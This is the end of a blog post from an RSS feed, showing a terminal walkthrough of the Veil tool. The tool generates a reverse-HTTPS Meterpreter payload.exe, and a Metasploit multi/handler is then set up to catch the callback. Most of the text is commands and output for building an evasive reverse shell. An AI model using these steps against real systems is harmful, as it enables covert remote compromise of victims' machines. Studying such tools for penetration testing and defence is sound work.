&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[&amp;gt;] Please enter the number of your choice: &lt;b&gt;1&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[?] What type of payload would you like?&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;1 - Reverse TCP&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;2 - Reverse HTTP&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;3 - Reverse HTTPS&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;0 - Main Menu&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[&amp;gt;] Please enter the number of your choice: &lt;b&gt;3&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
[?] What's the Local Host IP Address: &lt;b&gt;192.168.1.123&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
[?] What's the Local Port Number: &lt;b&gt;443&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
[*] Generating shellcode...&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[?] How would you like to create your payload executable?&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;1 - Pyinstaller (default)&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;2 - Py2Exe&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[&amp;gt;] Please enter the number of your choice: &lt;b&gt;1&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
55 INFO: wrote Z:\root\v\Veil\payload.spec&lt;/div&gt;
&lt;div&gt;
...&lt;/div&gt;
&lt;div&gt;
8134 INFO: Appending archive to EXE Z:\root\v\Veil\dist\payload.exe&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013&lt;/div&gt;
&lt;div&gt;
=========================================================================&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[!] Be sure to set up a Reverse HTTPS handler with the following settings:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;PAYLOAD = windows/meterpreter/reverse_https&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;LHOST &amp;nbsp; = 192.168.1.123&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;LPORT &amp;nbsp; = 443&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[!] Your payload files have been generated, don't get caught!&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# file payload.exe&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
payload.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit&lt;/div&gt;
&lt;div&gt;
...&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# msfconsole&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
msf &amp;gt; use exploit/multi/handler&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
msf &amp;nbsp;exploit(handler) &amp;gt; set PAYLOAD windows/meterpreter/reverse_https&lt;/div&gt;
&lt;div&gt;
PAYLOAD =&amp;gt; windows/meterpreter/reverse_https&lt;/div&gt;
&lt;div&gt;
msf &amp;nbsp;exploit(handler) &amp;gt; set LHOST 192.168.1.123&lt;/div&gt;
&lt;div&gt;
LHOST =&amp;gt; 192.168.1.123&lt;/div&gt;
&lt;div&gt;
msf &amp;nbsp;exploit(handler) &amp;gt; set LPORT 443&lt;/div&gt;
&lt;div&gt;
LPORT =&amp;gt; 443&lt;/div&gt;
&lt;div&gt;
msf &amp;nbsp;exploit(handler) &amp;gt; exploit&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
[*] Started HTTPS reverse handler on https://192.168.1.123:443/&lt;/div&gt;
&lt;div&gt;
[*] Starting the payload handler...&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkSmKZ02pOYofQaEGXokpEI0BLB7DATYl4GTOB4xz3LtWSzvWVe7TMpZaWFo87vVizqIOOy3wu08nvsH3HzeWD8LE0UgZRBQJ94nElw03pPbjwD09nIV-HLpZouZgI-_DZjJkVHfa0m4/s72-c/payload.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item></channel></rss>